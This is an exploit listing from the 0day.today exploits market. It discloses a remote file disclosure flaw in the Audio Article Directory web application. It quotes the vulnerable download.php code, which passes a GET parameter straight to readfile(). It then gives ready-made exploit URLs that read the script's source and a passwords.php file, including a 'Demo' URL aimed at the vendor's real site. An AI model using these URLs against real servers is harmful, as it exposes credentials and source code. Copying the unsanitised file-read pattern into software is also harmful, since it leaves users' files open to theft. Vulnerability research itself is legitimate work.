[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Audio Article Directory (file) Remote File Disclosure Vulnerability

Author
ThE g0bL!N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5430
Category
web applications
Date add
28-06-2009
Platform
unsorted
===================================================================
Audio Article Directory (file) Remote File Disclosure Vulnerability
===================================================================


#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
 header('Content-Description: File Transfer');
           header('Content-Type: application/force-download');
           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
           header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################




#  0day.today [2024-07-07]  #